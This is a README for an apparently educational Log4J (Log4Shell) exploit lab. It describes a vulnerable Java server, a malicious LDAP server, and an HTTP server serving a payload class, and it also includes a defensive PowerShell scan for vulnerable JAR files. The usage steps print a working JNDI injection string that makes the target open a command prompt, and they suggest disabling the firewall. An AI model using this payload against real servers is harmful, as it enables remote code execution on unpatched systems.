# Log4J-Testscript

This project is meant to help you simulate the Log4J Exploit on your device. 

## Description
This project contains four executable files:

* **Target.java**
  * Server which runs the Log4J library (requires JNDI) and is therefore vulnerable to the Log4J exploit.
  * Location: "/src/main/"
  * Port: 8080
* **HTTP_Server.java**
  * Server which returns the compiled Payload (Payload.class).
  * Location: "/src/main/"
  * Port: 8080
* **LDAP_Server.java**
  * Server which runs the LADP (Lightweight Directory Access Protocol) and returns the HTTP_Server reference.
  * Location: "/src/main/"
  * Port: 10389

Furthermore, there are two more java-files:

* **Payload.java**: This code will be executed on the target.
  * Location: "/src/main/"
* **TestRT.java**: This is a test-unit for the exploit code and is not necessary for the Project.
  * Location: "/src/main/"

## Installation
1) Clone the Repository via git ("git@gitlab.com:max-debug022/log4j-testscript.git")
2) Open the Repository as Maven Project in any IDE (I recommend using "IntelliJ IDEA Community Edition 2021.3" or "Eclipse")

## Usage
Execute the files in the following order:

1) Start "Target.java" (The console should now begin printing a log)
2) Start "LDAP_Server.java" (The console should now show "LDAP Server started!")
3) Start "HTTP_Server.java" (The console should now show "Payload Server started!")
4) Open any browser and enter the following line: `http://localhost:8000/home?param=${jndi:ldap://localhost:10389/cn=payload,dc=exploit}`
5) After entering the line the command-prompt on the target system should open.

## Scan your System

If you want to scan your system and find vulnerable Log4J libraries you can execute the following command in the Windows PowerShell:

`gci 'C:\' -rec -force -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path`

You can change "C:\\" to whatever hard-drive or path you want to scan.

## Troubleshooting

* Have you deactivated your Firewall while testing this exploit?
* Do you use JDK 8?
* Do you use Windows 8/8.1/10?

## License
MIT License

